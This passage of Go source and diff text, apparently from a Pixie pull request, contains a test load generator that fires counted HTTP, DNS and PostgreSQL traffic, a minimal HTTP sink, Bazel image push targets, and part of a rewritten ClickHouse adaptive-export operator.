LookupNetIP(ip4) on a FQDN with a +// trailing dot (suppresses /etc/resolv.conf search-domain expansion under +// ndots:5) → dns_events == DNS_N. Names need not resolve; an NXDOMAIN is +// still one captured query/response, so NXDOMAIN is not treated as failure. 
// manifest is the one-line JSON ground truth printed after the counted band:
// the number of operations fired per protocol plus the band boundaries and the
// identity of the pod that fired them.
type manifest struct {
	HTTP       int    `json:"http"`         // http_events expected
	DNS        int    `json:"dns"`          // dns_events expected (A queries)
	PGSQL      int    `json:"pgsql"`        // pgsql_events expected
	ConnTCPEst int    `json:"conn_tcp_est"` // conn_stats TCP rows expected (tolerance gate)
	B0         int64  `json:"b0"`           // band start, unix nanos (node clock == Pixie time_)
	B1         int64  `json:"b1"`           // band end, unix nanos
	B0ISO      string `json:"b0_iso"`
	B1ISO      string `json:"b1_iso"`
	Pod        string `json:"pod"`
	Namespace  string `json:"namespace"`
	Node       string `json:"node"`
}

// parseEnvInt converts the raw text v of env var k to an int. An empty v
// yields def; anything that is not an integer is an error.
func parseEnvInt(k, v string, def int) (int, error) {
	if v == "" {
		return def, nil
	}
	n, err := strconv.Atoi(v)
	if err != nil {
		return 0, fmt.Errorf("env %s=%q is not an integer", k, v)
	}
	return n, nil
}

// envInt returns env var k as an int (def when unset or empty) and exits the
// process when the value is not an integer.
func envInt(k string, def int) int {
	n, err := parseEnvInt(k, os.Getenv(k), def)
	if err != nil {
		fatalf("%v", err)
	}
	return n
}

// envCount is envInt for operation counts: a negative value is rejected,
// because it would fire nothing yet publish a negative "expected" count in the
// manifest that the assertions compare against.
func envCount(k string, def int) int {
	n := envInt(k, def)
	if n < 0 {
		fatalf("env %s=%d must be >= 0", k, n)
	}
	return n
}

// envStr returns env var k, or def when it is unset or empty.
func envStr(k, def string) string {
	if v := os.Getenv(k); v != "" {
		return v
	}
	return def
}

// fatalf prints a prefixed message to stderr and exits with status 1.
func fatalf(format string, a ...any) {
	fmt.Fprintf(os.Stderr, "cleanloadgen: "+format+"\n", a...)
	os.Exit(1)
}

// checkIPPort validates that v (the value of env var k) is a literal
// IP:port. Host names are rejected so that resolving an endpoint can never add
// DNS events to the counted band; the port must be in 1-65535.
func checkIPPort(k, v string) error {
	if v == "" {
		return fmt.Errorf("%s is required (IP:port, never a DNS name — see design)", k)
	}
	host, port, err := net.SplitHostPort(v)
	if err != nil {
		return fmt.Errorf("%s=%q is not host:port: %w", k, v, err)
	}
	if net.ParseIP(host) == nil {
		return fmt.Errorf("%s host %q must be a literal IP, not a name, so it cannot add DNS events", k, host)
	}
	if p, err := strconv.Atoi(port); err != nil || p < 1 || p > 65535 {
		return fmt.Errorf("%s=%q has an invalid port %q (need 1-65535)", k, v, port)
	}
	return nil
}

// mustIPPort returns env var k after validating it with checkIPPort, exiting
// the process on any violation.
func mustIPPort(k string) string {
	v := os.Getenv(k)
	if err := checkIPPort(k, v); err != nil {
		fatalf("%v", err)
	}
	return v
}

// pqQuote single-quotes v for use as a value in a key=value PostgreSQL
// connection string, escaping backslashes and single quotes, so credentials
// containing spaces or quotes cannot break or extend the DSN.
func pqQuote(v string) string {
	return "'" + strings.NewReplacer(`\`, `\\`, `'`, `\'`).Replace(v) + "'"
}

// fireHTTP issues n GET requests to http://addr+path, each on its own TCP
// connection, and exits the process on the first transport error or non-2xx
// status (the rep is discarded rather than mis-counted).
func fireHTTP(addr, path string, n int) {
	url := "http://" + addr + path
	for i := 0; i < n; i++ {
		// Fresh transport per request guarantees a new TCP connection.
		tr := &http.Transport{DisableKeepAlives: true}
		cl := &http.Client{Transport: tr, Timeout: 5 * time.Second}
		resp, err := cl.Get(url)
		if err != nil {
			fatalf("http request %d/%d to %s failed: %v", i+1, n, url, err)
		}
		// Drain before closing so the exchange completes; the body content
		// itself is irrelevant, hence the ignored result.
		_, _ = io.Copy(io.Discard, resp.Body)
		resp.Body.Close()
		if resp.StatusCode/100 != 2 {
			fatalf("http request %d/%d to %s: status %d (need 2xx)", i+1, n, url, resp.StatusCode)
		}
		tr.CloseIdleConnections()
	}
}

// fireDNS performs one ip4 lookup for each of the n names produced by
// formatting base with 0..n-1. NXDOMAIN counts as success; any other error
// exits the process.
func fireDNS(base string, n int) {
	res := &net.Resolver{PreferGo: true}
	for i := 0; i < n; i++ {
		name := fmt.Sprintf(base, i)
		if !strings.HasSuffix(name, ".") {
			fatalf("DNS_BASE must yield an FQDN ending in '.' to suppress search expansion; got %q", name)
		}
		ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
		// ip4 → a single A query. NXDOMAIN is fine: the query/response is still
		// one captured dns_event. Any OTHER error (timeout) means the query may
		// not have completed deterministically → fail the rep.
		_, err := res.LookupNetIP(ctx, "ip4", name)
		cancel()
		if err != nil && !isNXDomain(err) {
			fatalf("dns lookup %d/%d for %s failed non-NXDOMAIN: %v", i+1, n, name, err)
		}
	}
}

// firePG runs n separate `SELECT 1` statements against addr through a pool
// capped at one connection, exiting the process on the first failure. The
// "postgres" driver must be registered by the file's blank import of lib/pq.
func firePG(addr string, n int) {
	host, port, err := net.SplitHostPort(addr)
	if err != nil {
		fatalf("PG_ADDR=%q is not host:port: %v", addr, err)
	}
	dsn := fmt.Sprintf("host=%s port=%s user=%s password=%s dbname=%s sslmode=disable connect_timeout=5",
		host, port,
		pqQuote(envStr("PG_USER", "postgres")),
		pqQuote(envStr("PG_PASSWORD", "postgres")),
		pqQuote(envStr("PG_DB", "postgres")))
	db, err := sql.Open("postgres", dsn)
	if err != nil {
		fatalf("pg open: %v", err)
	}
	db.SetMaxOpenConns(1)
	db.SetMaxIdleConns(1)
	for i := 0; i < n; i++ {
		var one int
		if err := db.QueryRow("SELECT 1").Scan(&one); err != nil {
			fatalf("pg query %d/%d failed: %v", i+1, n, err)
		}
	}
	// All statements already succeeded; a close error cannot change the count.
	_ = db.Close()
}

// sustainDNS trickles one DISTINCT ip4 lookup per second (names formatted from
// base, starting at index next) for duration d. It reports true when a
// termination signal arrived on sig before the deadline.
func sustainDNS(sig <-chan os.Signal, base string, next int, d time.Duration) bool {
	deadline := time.Now().Add(d)
	ticker := time.NewTicker(time.Second)
	defer ticker.Stop()
	res := &net.Resolver{PreferGo: true}
	for time.Now().Before(deadline) {
		select {
		case <-sig:
			return true
		case <-ticker.C:
			ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
			// Best-effort: the trickle only needs the query on the wire, so the
			// lookup result and error are deliberately ignored.
			_, _ = res.LookupNetIP(ctx, "ip4", fmt.Sprintf(base, next))
			cancel()
			next++
		}
	}
	return false
}

// main fires the exact counted band (HTTP, then DNS, then PGSQL), prints the
// manifest and the AELOAD_FIRED sentinel, optionally sustains a DNS trickle,
// and then holds until SIGTERM/SIGINT.
func main() {
	var (
		httpN     = envCount("HTTP_N", 100)
		dnsN      = envCount("DNS_N", 100)
		pgN       = envCount("PGSQL_N", 100)
		httpAddr  = mustIPPort("HTTP_ADDR") // e.g. 10.43.0.10:8080
		httpPath  = envStr("HTTP_PATH", "/ping")
		dnsBase   = envStr("DNS_BASE", "t-%d.aeload.svc.cluster.local.") // trailing dot = FQDN
		settlePre = time.Duration(envInt("SETTLE_PRE_MS", 1500)) * time.Millisecond
	)
	// PG_ADDR is only required (and validated) when statements will be fired;
	// with PGSQL_N=0 it may be left unset.
	var pgAddr string
	if pgN > 0 {
		pgAddr = mustIPPort("PG_ADDR")
	}

	// Let the pod's networking settle and the upid register before the band
	// opens, so no stray startup traffic lands inside [B0,B1].
	time.Sleep(settlePre)

	b0 := time.Now()
	fireHTTP(httpAddr, httpPath, httpN)
	fireDNS(dnsBase, dnsN)
	if pgN > 0 {
		firePG(pgAddr, pgN)
	}
	b1 := time.Now()

	m := manifest{
		HTTP:       httpN,
		DNS:        dnsN,
		PGSQL:      pgN,
		ConnTCPEst: httpN + boolToInt(pgN > 0), // HTTP_N new conns + 1 pg conn
		B0:         b0.UnixNano(),
		B1:         b1.UnixNano(),
		B0ISO:      b0.UTC().Format(time.RFC3339Nano),
		B1ISO:      b1.UTC().Format(time.RFC3339Nano),
		Pod:        envStr("POD_NAME", os.Getenv("HOSTNAME")),
		Namespace:  envStr("POD_NAMESPACE", "aeload"),
		Node:       envStr("NODE_NAME", ""),
	}
	out, err := json.Marshal(m)
	if err != nil {
		fatalf("marshal manifest: %v", err)
	}
	fmt.Printf("AELOAD_MANIFEST %s\n", out)
	fmt.Println("AELOAD_FIRED")

	sig := make(chan os.Signal, 1)
	signal.Notify(sig, syscall.SIGTERM, syscall.SIGINT)

	// SUSTAIN: after the exact counted band, optionally keep a low continuous
	// trickle of DISTINCT DNS lookups for SUSTAIN_SEC, starting at index DNS_N
	// so no counted name is repeated. The trickle happens after B1, so it is
	// outside the counted band. For exact-count tests leave SUSTAIN_SEC=0 and
	// pre-warm via SETTLE_PRE_MS instead.
	if sustainSec := envInt("SUSTAIN_SEC", 0); sustainSec > 0 {
		if sustainDNS(sig, dnsBase, dnsN, time.Duration(sustainSec)*time.Second) {
			return
		}
	}

	// HOLD: keep the process (and therefore the pod) alive until the harness
	// terminates it.
	<-sig
}

// boolToInt maps true to 1 and false to 0.
func boolToInt(b bool) int {
	if b {
		return 1
	}
	return 0
}

// isNXDomain reports whether err is a "no such host" DNS error (the expected,
// fully-deterministic outcome for synthetic names) rather than a transport
// failure that would make the query count non-deterministic.
func isNXDomain(err error) bool {
	var de *net.DNSError
	if errors.As(err, &de) {
		return de.IsNotFound
	}
	return false
}
// main runs the silent HTTP sink: every path answers 200 with the body "ok\n".
// The listen address comes from LISTEN_ADDR and falls back to ":8080" when that
// variable is unset or empty. ListenAndServe only returns on failure, and that
// error is escalated with panic.
func main() {
	listen := os.Getenv("LISTEN_ADDR")
	if listen == "" {
		listen = ":8080"
	}

	routes := http.NewServeMux()
	routes.Handle("/", http.HandlerFunc(func(rw http.ResponseWriter, _ *http.Request) {
		rw.WriteHeader(http.StatusOK)
		// The client only needs the status line; a short write is not actionable.
		_, _ = rw.Write([]byte("ok\n"))
	}))

	server := http.Server{Addr: listen, Handler: routes}
	if err := server.ListenAndServe(); err != nil {
		panic(err)
	}
}
Therefore # we only need to provide the bazel SDK versions for the client containers. go_container_libraries( - container_type = "grpc_client", bazel_sdk_versions = pl_all_supported_go_sdk_versions, + container_type = "grpc_client", ) go_container_libraries( - container_type = "tls_server", bazel_sdk_versions = pl_all_supported_go_sdk_versions, + container_type = "tls_server", prebuilt_container_versions = pl_go_test_versions, ) # Stirling test cases usually test server side tracing. Therefore # we only need to provide the bazel SDK versions for the client containers. go_container_libraries( - container_type = "tls_client", bazel_sdk_versions = pl_all_supported_go_sdk_versions, + container_type = "tls_client", ) pl_cc_test_library( diff --git a/src/vizier/services/adaptive_export/BUILD.bazel b/src/vizier/services/adaptive_export/BUILD.bazel index 38773121091..b352fa213f6 100644 --- a/src/vizier/services/adaptive_export/BUILD.bazel +++ b/src/vizier/services/adaptive_export/BUILD.bazel @@ -14,6 +14,8 @@ # # SPDX-License-Identifier: Apache-2.0 +load("@io_bazel_rules_docker//container:container.bzl", "container_bundle") +load("@io_bazel_rules_docker//contrib:push-all.bzl", "container_push") load("//bazel:pl_build_system.bzl", "pl_go_image") pl_go_image( @@ -24,3 +26,27 @@ pl_go_image( "//src/vizier:__subpackages__", ], ) + +# Single-image bundle + push targets — same shape as +# //k8s/vizier:image_bundle / vizier_images_push, but scoped to ONLY +# the adaptive_export image so the SBOB PoC can rebuild this one +# component without rebuilding kelvin / pem / metadata. Consumed by +# .github/workflows/adaptive_export_image.yaml via +# `bazel run :adaptive_export_image_push` with the standard +# --//k8s:image_repository / --//k8s:image_version overrides. 
+container_bundle( + name = "adaptive_export_image_bundle", + images = { + "$(IMAGE_PREFIX)/vizier-adaptive_export_image:$(BUNDLE_VERSION)": ":adaptive_export_image", + }, + toolchains = [ + "//k8s:image_prefix", + "//k8s:bundle_version", + ], +) + +container_push( + name = "adaptive_export_image_push", + bundle = ":adaptive_export_image_bundle", + format = "Docker", +) diff --git a/src/vizier/services/adaptive_export/cmd/BUILD.bazel b/src/vizier/services/adaptive_export/cmd/BUILD.bazel index e5cc4fe7423..1ebaf3c27cd 100644 --- a/src/vizier/services/adaptive_export/cmd/BUILD.bazel +++ b/src/vizier/services/adaptive_export/cmd/BUILD.bazel @@ -24,10 +24,21 @@ go_library( visibility = ["//visibility:private"], deps = [ "//src/api/go/pxapi", + "//src/shared/services", + "//src/vizier/services/adaptive_export/internal/activeset", + "//src/vizier/services/adaptive_export/internal/clickhouse", "//src/vizier/services/adaptive_export/internal/config", + "//src/vizier/services/adaptive_export/internal/control", + "//src/vizier/services/adaptive_export/internal/controller", + "//src/vizier/services/adaptive_export/internal/passthrough", "//src/vizier/services/adaptive_export/internal/pixie", + "//src/vizier/services/adaptive_export/internal/pixieapi", "//src/vizier/services/adaptive_export/internal/pxl", + "//src/vizier/services/adaptive_export/internal/reconcile", "//src/vizier/services/adaptive_export/internal/script", + "//src/vizier/services/adaptive_export/internal/sink", + "//src/vizier/services/adaptive_export/internal/streaming", + "//src/vizier/services/adaptive_export/internal/trigger", "@com_github_sirupsen_logrus//:logrus", ], ) diff --git a/src/vizier/services/adaptive_export/cmd/main.go b/src/vizier/services/adaptive_export/cmd/main.go index 10d178f6b3f..7cb5ae6d1ee 100644 --- a/src/vizier/services/adaptive_export/cmd/main.go +++ b/src/vizier/services/adaptive_export/cmd/main.go @@ -14,394 +14,876 @@ // // SPDX-License-Identifier: Apache-2.0 +// Adaptive-export 
operator (push flow, design rev 2). +// +// Lifecycle (one pod per node, deployed as a DaemonSet): +// +// 1. boot: +// - load config (env + k8s downward API for NODE_NAME) +// - ensure ClickHouse retention plugin is enabled (idempotent; +// retention scripts themselves are user-defined in the Pixie UI) +// - rehydrate the in-memory active set from +// forensic_db.adaptive_attribution FINAL WHERE hostname= +// - start the trigger + controller +// +// 2. steady state: +// - trigger polls forensic_db.kubescape_logs WHERE hostname= +// - controller derives anomaly hash from each event and writes a +// forensic_db.adaptive_attribution row (one INSERT per event; +// ReplacingMergeTree(t_end) collapses re-inserts to the latest +// end_time, extending the active window) +// +// 3. shutdown: +// - on SIGINT/SIGTERM, cancel context, drain. package main import ( "context" "fmt" + "net/http" + _ "net/http/pprof" // /debug/pprof/* on the debug-only listener (gated by AE_PPROF_ADDR; not in release builds otherwise unused) "os" "os/signal" + "strconv" "strings" + "sync" "syscall" "time" log "github.com/sirupsen/logrus" "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/shared/services" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" "px.dev/pixie/src/vizier/services/adaptive_export/internal/config" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/control" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixie" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi" "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" + 
"px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" ) const ( - defaultRetries = 100 - defaultSleepTime = 15 * time.Second - schemaCreationInterval = 2 * time.Minute - setupTimeout = 30 * time.Second - scriptExecutionTimeout = 60 * time.Second -) - -const ( - schemaCreationScriptTmpl = ` -import px -px.display(px.CreateClickHouseSchemas( - host="%s", - port=%s, - username="%s", - password="%s", - database="%s" -)) -` - detectionScriptTmpl = ` -import px - -df = px.DataFrame('%s', clickhouse_dsn='%s', start_time='-%ds') -df.alert = df.message -df.namespace = px.pluck(df.RuntimeK8sDetails, "podNamespace") -df.podName = px.pluck(df.RuntimeK8sDetails, "podName") -df.time_ = px.int64_to_time(df.event_time * 1000000000) -df = df[['time_', 'alert', 'namespace', 'podName']] -px.display(df) -` + // envCHHTTPEndpoint overrides the ClickHouse HTTP endpoint used by + // both the trigger (poll kubescape_logs) and the sink (write + // adaptive_attribution). Defaults to http://:8123. + envCHHTTPEndpoint = "FORENSIC_CH_HTTP_ENDPOINT" + + // envNodeName is the k8s downward API var the DaemonSet sets via + // `valueFrom: fieldRef: spec.nodeName`. Falls back to os.Hostname(). + envNodeName = "NODE_NAME" + + // envWindowBeforeSec / envWindowAfterSec / envTriggerPollMS / + // envPruneIntervalSec are programmatic overrides per the spec. + envWindowBeforeSec = "ADAPTIVE_WINDOW_BEFORE_SEC" + envWindowAfterSec = "ADAPTIVE_WINDOW_AFTER_SEC" + envTriggerPollMS = "ADAPTIVE_TRIGGER_POLL_MS" + envPruneIntervalSec = "ADAPTIVE_PRUNE_INTERVAL_SEC" + + // envPushRefreshSec overrides controller.PushRefreshInterval. Unset → + // 30s default. A NEGATIVE value selects single-shot mode (one pull per + // anomaly window), which the load-test harness uses so the non-deduping + // MergeTree protocol tables get each window exactly once. 
+ envPushRefreshSec = "ADAPTIVE_PUSH_REFRESH_SEC" + + // envTriggerHTTPTimeoutSec — per-poll HTTP budget (default 30s). + // The pre-watermark 5s default timed out every catch-up SELECT. + envTriggerHTTPTimeoutSec = "ADAPTIVE_TRIGGER_HTTP_TIMEOUT_SEC" + + // envTriggerPollLimit — max rows fetched per poll (default 10000). + // Bounds catch-up work after a restart so an N-hour backlog + // drains in ceil(N/PollLimit) polls instead of one giant scan. + envTriggerPollLimit = "ADAPTIVE_TRIGGER_POLL_LIMIT" + + // envWatermarkSaveSec — minimum interval between persistent + // watermark INSERTs (default 5s). The in-memory watermark + // advances every successful poll; flush is throttled. + envWatermarkSaveSec = "ADAPTIVE_WATERMARK_SAVE_SEC" + + // envSkipApply lets a deployment opt out of in-process DDL when + // the schema has been pre-applied by a separate Job (recommended + // production split: high-priv Job for CREATE TABLE / ALTER, then + // the operator runs with INSERT-only creds and skips Apply). + // VerifyPixieSchema still runs and refuses to start on drift. + envSkipApply = "ADAPTIVE_SKIP_APPLY" + + // envInstallPresets makes the operator boot install Pixie's preset + // retention scripts on this cluster. One-shot, idempotent (script-name + // match → skip). Defaults to false because the production design has + // users author scripts in the Pixie UI. + envInstallPresets = "INSTALL_PRESET_SCRIPTS" + + // === Throughput-protection knobs for the pushPixieRows fan-out. + // All default to 0 (= legacy unbounded behavior preserved). + envMaxParallelQueriesPerHash = "ADAPTIVE_MAX_PARALLEL_QUERIES_PER_HASH" + envMaxInflightQueriesGlobal = "ADAPTIVE_MAX_INFLIGHT_QUERIES_GLOBAL" + envEmptyResultSkipAfterN = "ADAPTIVE_EMPTY_RESULT_SKIP_AFTER_N" + envEmptyResultSkipTTLSec = "ADAPTIVE_EMPTY_RESULT_SKIP_TTL_SEC" + + // envPushPixieTables — when true, the operator queries vizier + // directly via pxapi on each fresh anomaly and writes the resulting + // rows to forensic_db.
(rev-1 path). Required when the + // cloud's retention plugin can't reach the in-cluster CH (e.g. + // AOCC pixie cloud + CH ClusterIP service). + envPushPixieTables = "ADAPTIVE_PUSH_PIXIE_ROWS" + + // envAdaptiveWriteMode selects the protocol-table write path: + // "pull" → rev-2: per-hash×per-table fan-out (default) + // "streaming" → rev-3: N TableScanners with shared allowlist + // (see .local/adaptive-write-rev3-plan.md) + envAdaptiveWriteMode = "ADAPTIVE_WRITE_MODE" + + // envPassthrough — firehose mode counterpart to the anomaly-gated + // path. When "true", a single background loop queries every pixie + // observation table with an empty Target (no ns/pod predicate), + // over the rolling window, and writes the result via the existing + // sink. Enables A/B measurement of AE's capture fraction by + // running the same workload+window twice with the env flipped. + envPassthrough = "ADAPTIVE_PASSTHROUGH" + envPassthroughWindow = "ADAPTIVE_PASSTHROUGH_WINDOW_SEC" + envPassthroughRefresh = "ADAPTIVE_PASSTHROUGH_REFRESH_SEC" + // envPassthroughCompiled — selects the firehose query path. Default + // ON: per-table PxL is precompiled once and all tables are pulled + // concurrently per tick. Set to "false" to revert to the legacy path + // (QueryFor rebuilt per tick, tables walked serially). + envPassthroughCompiled = "ADAPTIVE_PASSTHROUGH_COMPILED" + + // envReconcile — per-pull write-fidelity instrument. When "true", + // every data-plane pull (filter / passthrough / streaming) records + // one forensic_db.ae_reconcile row (read_count vs wrote_count, window, + // pod) so a reconcile run can localize loss to query (R5) vs sink (R6). + // Off by default; the recorder is reconcile.Nop{} unless set. 
+ envReconcile = "ADAPTIVE_RECONCILE" ) -func renderSchemaScript(cfg config.ClickHouse) string { - return fmt.Sprintf(schemaCreationScriptTmpl, - cfg.Host(), cfg.Port(), cfg.User(), cfg.Password(), cfg.Database()) -} - -func renderDetectionScript(cfg config.ClickHouse, lookback int64) string { - return fmt.Sprintf(detectionScriptTmpl, cfg.Table(), cfg.DSN(), lookback) -} - func main() { + // Wire AE into the shared pixie service scaffold: + // - SetupService registers --version + ports. + // - SetupSSLClientFlags adds the client TLS flags pxapi uses + // when --disable_ssl=false (cluster TLS into vizier). + // - PostFlagSetupAndParse runs pflag.Parse and binds viper to + // PL_*-prefixed env vars (so PL_JWT_SIGNING_KEY etc. work + // without any custom os.Getenv plumbing). + // - SetupServiceLogging switches logrus to JSON for log shippers. + // AE doesn't run a gRPC server, so CheckServiceFlags is skipped — + // it panics on missing --server_tls_key/cert which AE has no use + // for. + services.SetupService("adaptive-export", 50900) + services.SetupSSLClientFlags() + services.PostFlagSetupAndParse() + services.SetupServiceLogging() + ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log.Info("Starting the ClickHouse Adaptive Export service") + // Debug pprof listener — gated on AE_PPROF_ADDR (e.g. "127.0.0.1:6060"). + // Off by default; when set, /debug/pprof/* on that addr exposes the + // runtime profiles for live CPU / heap / goroutine investigations. The + // blank-import of net/http/pprof above registers the handlers on the + // DefaultServeMux. Bind loopback in containers unless you port-forward. 
+ if addr := os.Getenv("AE_PPROF_ADDR"); addr != "" { + go func() { + log.WithField("addr", addr).Info("pprof listening (/debug/pprof/*)") + if err := http.ListenAndServe(addr, nil); err != nil && + err != http.ErrServerClosed { + log.WithError(err).Error("pprof listener stopped") + } + }() + } + + log.Info("starting adaptive-export operator (push flow, rev 2)") cfg, err := config.GetConfig() if err != nil { log.WithError(err).Fatal("failed to load configuration") } - clusterID := cfg.Pixie().ClusterID() - clusterName := cfg.Worker().ClusterName() - - // Setup Pixie Plugin API client - log.Infof("Setting up Pixie plugin API client for cluster-id %s", clusterID) - pluginClient, err := setupPixie(ctx, cfg.Pixie(), defaultRetries, defaultSleepTime) + hostname, err := resolveHostname() if err != nil { - log.WithError(err).Fatal("setting up Pixie plugin client failed") + log.WithError(err).Fatal("failed to resolve node identity — set NODE_NAME via k8s downward API (spec.nodeName)") } + log.WithField("hostname", hostname).Info("operator pod is node-local") + + chEndpoint := chHTTPEndpoint(cfg.ClickHouse().Host(), os.Getenv(envCHHTTPEndpoint)) + log.WithField("endpoint", chEndpoint).Info("clickhouse HTTP endpoint resolved") - // Setup Pixie pxapi client for executing PxL scripts - log.Info("Setting up Pixie pxapi client") - // Use parent context - client stores this and uses it for all subsequent operations - pxClient, err := pxapi.NewClient(ctx, pxapi.WithAPIKey(cfg.Pixie().APIKey()), pxapi.WithCloudAddr(cfg.Pixie().Host())) + // 1. Apply operator-owned DDL FIRST, before Pixie's retention plugin + // has a chance to auto-create pixie tables with its minimal + // column set (no namespace / pod). The kubescape tables + // (alerts, kubescape_logs) are owned by the soc installer and + // are NOT touched here. 
+ applier, err := clickhouse.NewApplier(chEndpoint, cfg.ClickHouse().User(), cfg.ClickHouse().Password()) if err != nil { - log.WithError(err).Fatal("failed to create pxapi client") - } - - // Start schema creation background task. This drives - // px.CreateClickHouseSchemas, which issues CREATE TABLE IF NOT EXISTS - // for every Pixie stirling table the metadata service knows about. In - // labs where ClickHouse users don't have DDL rights (e.g. soc's - // ingest_writer with allow_ddl=0), the CREATE silently fails and only - // tables pre-created by external schema.sql work. Off by default to - // avoid noisy server logs; opt-in via env when you want Pixie's - // automatic schema bootstrap. - if strings.EqualFold(os.Getenv("ENABLE_SCHEMA_CREATION"), "true") { - log.Info("ENABLE_SCHEMA_CREATION=true — starting schema creation task") - go runSchemaCreationTask(ctx, pxClient, clusterID, cfg.ClickHouse()) + log.WithError(err).Fatal("failed to construct schema applier") + } + if strings.EqualFold(os.Getenv(envSkipApply), "true") { + log.Info("ADAPTIVE_SKIP_APPLY=true — schema apply skipped; expecting an out-of-band DDL Job to have created the tables") } else { - log.Info("Schema creation task disabled (set ENABLE_SCHEMA_CREATION=true to opt in)") + if err := applier.Apply(ctx); err != nil { + log.WithError(err).Fatal("schema apply failed; refusing to proceed with possibly drifted tables") + } + log.WithField("tables", clickhouse.OperatorOwnedTables).Info("operator-owned DDL applied") } - // Start detection + reconcile loop that turns the retention plugin on/off - go runDetectionTask(ctx, pxClient, pluginClient, cfg, clusterID, clusterName) - - // Wait for signal to shutdown - sigCh := make(chan os.Signal, 1) - signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) - <-sigCh - - log.Info("Shutting down adaptive export service") - cancel() - time.Sleep(1 * time.Second) -} + // 2. 
Defensive guard against Pixie's retention plugin having + // auto-created any pixie table BEFORE our Apply ran (e.g. a + // pre-existing cluster install). Refuse to start if drift + // detected so the misconfig is loud, not silent. + if err := applier.VerifyPixieSchema(ctx); err != nil { + log.WithError(err).Fatal("pixie table schema drift detected — pre-existing tables are missing operator-required columns; drop and re-create OR ALTER TABLE ADD COLUMN before retrying") + } + log.Info("pixie table schemas verified — namespace + pod columns present on all 12 tables") + + // 3. Best-effort: ensure the Pixie ClickHouse retention plugin is + // enabled. The retention scripts themselves are defined by the + // user via the Pixie UI — we don't manage them. The cloud client + // is OPTIONAL — direct-mode query (set up in step 5) does not + // need it, so a cloud-side outage must not block the operator + // from starting. Downgrade the failure to a warning and skip the + // plugin/preset steps that depend on this client. + pluginClient, err := pixie.NewClient(ctx, cfg.Pixie().APIKey(), cfg.Pixie().Host()) + if err != nil { + log.WithError(err).Warn("could not create pixie cloud plugin client — skipping plugin enablement and preset install; pixie tables will stay empty until the user enables the plugin in the Pixie UI") + pluginClient = nil + } + if pluginClient != nil { + chDSN := cfg.ClickHouse().DSN() + exportURL, err := pluginClient.EnsureClickHousePluginEnabled(chDSN) + if err != nil { + // non-fatal — the operator's own write path doesn't depend on + // the plugin; analyst joins against pixie-table rows do, but a + // missing plugin is a deployment misconfiguration the user + // surfaces via UI. 
+ log.WithError(err).Warn("could not ensure ClickHouse plugin is enabled — pixie tables will not be populated until you turn it on in the Pixie UI") + } else { + log.WithField("export_url", exportURL).Info("clickhouse retention plugin is enabled") + } -func runSchemaCreationTask(ctx context.Context, client *pxapi.Client, clusterID string, chCfg config.ClickHouse) { - ticker := time.NewTicker(schemaCreationInterval) - defer ticker.Stop() - - runOnce := func() { - log.Info("Running schema creation script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - defer cancel() - if _, err := pxl.ExecuteScript(execCtx, client, clusterID, renderSchemaScript(chCfg)); err != nil { - log.WithError(err).Error("failed to execute schema creation script") - return + // 3b. (optional) install Pixie's preset retention scripts so the + // pixie observation tables actually receive rows. Without this, + // the plugin is enabled but does nothing. + if strings.EqualFold(os.Getenv(envInstallPresets), "true") { + installed, err := installPresetScripts(pluginClient, cfg.Pixie().ClusterID(), cfg.Worker().ClusterName()) + if err != nil { + log.WithError(err).Warn("INSTALL_PRESET_SCRIPTS=true but install failed — pixie tables will stay empty") + } else { + log.WithField("installed", installed).Info("preset retention scripts installed on cluster") + } } - log.Info("Schema creation script completed successfully") } - runOnce() - for { - select { - case <-ctx.Done(): - log.Info("Schema creation task shutting down") - return - case <-ticker.C: - runOnce() - } + // 4. Build trigger + sink + controller. 
+ pollInterval := durEnv(envTriggerPollMS, 250*time.Millisecond, time.Millisecond) + httpTimeout := durEnv(envTriggerHTTPTimeoutSec, 30*time.Second, time.Second) + saveInterval := durEnv(envWatermarkSaveSec, 5*time.Second, time.Second) + pollLimit := intEnv(envTriggerPollLimit, 10000) + // Persistent watermark store keeps the trigger's kubescape_logs + // cursor in forensic_db.trigger_watermark, so a restart on a busy + // node doesn't replay the full table from event_time=0 (which + // timed out every single HTTP read and pinned the watermark at 0 + // forever — the failure mode that produced "AE silent for 10h + // after OOM-restart" in the field). + wmStore, err := trigger.NewClickHouseWatermarkStore( + chEndpoint, cfg.ClickHouse().Database(), + cfg.ClickHouse().User(), cfg.ClickHouse().Password(), + httpTimeout) + if err != nil { + log.WithError(err).Fatal("failed to create persistent watermark store") + } + trg, err := trigger.New(trigger.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Table: cfg.ClickHouse().Table(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + Hostname: hostname, + PollInterval: pollInterval, + Watermark: wmStore, + WatermarkSaveInterval: saveInterval, + PollLimit: pollLimit, + HTTPTimeout: httpTimeout, + }) + if err != nil { + log.WithError(err).Fatal("failed to create trigger") + } + + snk, err := sink.New(sink.Config{ + Endpoint: chEndpoint, + Database: cfg.ClickHouse().Database(), + Username: cfg.ClickHouse().User(), + Password: cfg.ClickHouse().Password(), + }) + if err != nil { + log.WithError(err).Fatal("failed to create sink") } -} -func runDetectionTask(ctx context.Context, pxClient *pxapi.Client, pluginClient *pixie.Client, cfg config.Config, clusterID string, clusterName string) { - detectionInterval := time.Duration(cfg.Worker().DetectionInterval()) * time.Second - detectionLookback := cfg.Worker().DetectionLookback() - quietTicks := cfg.Worker().ExportQuietTicks() - 
